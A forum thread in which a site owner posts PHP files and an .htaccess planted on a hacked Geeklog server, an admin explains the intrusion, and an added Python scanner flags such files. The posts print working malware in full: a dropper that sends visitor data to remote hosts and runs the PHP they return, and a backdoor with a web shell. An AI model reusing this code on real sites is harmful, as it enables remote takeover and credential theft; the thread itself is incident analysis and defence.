Geeklog Forums
hacking a family site
hacked
Anonymous
I've recently found these files strewn throughout my system dirs under various names, and .htaccess files providing redirects to them from a 404 (or something like that):
first file:
<?
error_reporting(0);
$s="e";
// gathers host, URL, query string, referer, user agent and the visitor's IP for every request
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
// sends that data to a remote host (the base64 literals decode to "http://" and two host names)
// and executes whatever PHP that host returns; falls back to a second host if the first fails
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}
?>
second file:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
// same idea: include_once() of a remote URL (the base64 literal decodes to a "master.php" URL on a remote host),
// passing the visitor IP, the requested URL and any credentials that were POSTed
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
// if the remote include fails, it runs a shell command taken from the query string
// and reports the kernel/OS version to anyone who POSTs l=special
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
and the .htaccess file:
Options -MultiViews
ErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php
what's up with that? how could these files have got there and what do they do? I'm deleting them as I find them. They are in a whole bunch of directories. ...and I don't have a clue how to read server logs.
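The files above share a small set of traits: they silence errors, include() a URL that is only visible after base64 decoding, and (in the second file) run a shell command straight from the request; the .htaccess makes the dropper the handler for every missing URL, so it runs without anyone requesting it by name. As an added example, not code from the thread or from Geeklog, here is a Python triage script that walks a web root for exactly those traits and decodes the base64 literals so you can see which hosts a file would contact. The directory layout and file contents it scans are constructed from the fragments quoted in the post and written to a temporary directory, so it runs offline; point scan_tree() at a real document root to use it for real.

```python
"""Triage scanner for the dropper pattern quoted in this thread.

Example code written for this page; not part of Geeklog. The sample tree
below is constructed from the posted fragments so the script runs offline.
"""
import base64
import os
import re
import tempfile

# Indicators taken from the two files quoted in the post.
PHP_INDICATORS = {
    # include()/include_once() of a string that only exists at runtime
    "include-of-base64-decoded-string":
        re.compile(r"@?include(?:_once)?\s*\(\s*base64_decode\s*\(", re.I),
    # shell command taken straight from the request, e.g. system($_GET[...])
    "shell-exec-from-request":
        re.compile(r"\b(?:system|exec|passthru|shell_exec|popen)\s*\(\s*"
                   r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # PHP backtick operator, e.g. `uname -a`
    "backtick-shell-operator": re.compile(r"`[^`\n]+`"),
    # weak on its own, but both posted files open with it
    "errors-silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
}
B64_LITERAL = re.compile(r"""base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
# a 404 handler that is a PHP script: the redirect the poster describes
HTACCESS_404_PHP = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(\S+\.php)\b", re.I | re.M)


def decoded_literals(src):
    """Decode every base64 literal handed to base64_decode(), in file order."""
    out = []
    for m in B64_LITERAL.finditer(src):
        try:
            out.append(base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace"))
        except ValueError:
            out.append("<undecodable>")
    return out


def scan_php(src):
    hits = [name for name, rx in PHP_INDICATORS.items() if rx.search(src)]
    return {"indicators": hits, "decoded": decoded_literals(src)}


def scan_htaccess(src):
    targets = HTACCESS_404_PHP.findall(src)
    return {"indicators": ["404-handler-is-php"] if targets else [], "targets": targets}


def scan_tree(root):
    """Return {relative path: findings} for every flagged file under root.
    Any file containing a PHP open tag is checked regardless of its name,
    because the poster found the dropper under assorted names."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            if name == ".htaccess":
                result = scan_htaccess(src)
            elif "<?" in src:
                result = scan_php(src)
            else:
                continue
            if result["indicators"]:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = result
    return findings


# Constructed sample tree: the distinguishing lines of the posted files plus two benign files.
SAMPLE_FILES = {
    "plugins/someplugin/includes.php": (  # condensed from the "second file"
        '<?php error_reporting(0);\n'
        'if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . $user_auth))\n'
        '{ if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}\n'
        '  if($_POST["l"]=="special"){print "sys_active". `uname -a`;} }\n?>'
    ),
    "plugins/someplugin/.htaccess": (  # the posted .htaccess
        "Options -MultiViews\nErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php\n"
    ),
    "data/index.php": (  # condensed from the "first file"
        '<? error_reporting(0);$str=base64_encode($_SERVER["HTTP_HOST"]).".e";\n'
        'if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}\n'
        'else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>'
    ),
    "public_html/index.php": '<?php\necho "hello";\n',            # benign, must not be flagged
    "public_html/.htaccess": "Options -Indexes\nErrorDocument 404 /404.html\n",
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, result in sorted(scan_tree(build_sample_tree()).items()):
        print(rel)
        for key, value in result.items():
            print("   ", key, value)
```

Run it as-is to see the three constructed files flagged and the decoded literals listed per file; the two benign files produce no output. On a real box, run scan_tree() over every document root on the server (the poster found copies across several domains and a WordPress install too), and treat the decoded hosts as the first thing to look for in the web server's access logs.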
Dirk
Site Admin
Which Geeklog version are you on?
Unfortunately, we had a few issues recently that allowed attackers to execute arbitrary code - which means that they could do just about anything, including creating or uploading new files.
bye, Dirk
hacked
Anonymous
I found the files while upgrading to 1.4sr5, but the modification date of the files shows that they were created when I was still running 1.3.11sr1.
upgrade went fine by the way.
the geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password protected dir as well as many publicly accessible directories.
I found these files across 3 domains, 2 subdomains, all on the same server obviously, involving not only Geeklog installations but 2 WordPress installations as well. I found them mostly in any directories named: data; backups; logs; userphotos; articles; default; and a few others that I can't remember.
HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) was changed. The new username was also added to the database with all privileges. wtf?!
Dirk
Site Admin
Sounds really bad
The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...
bye, Dirk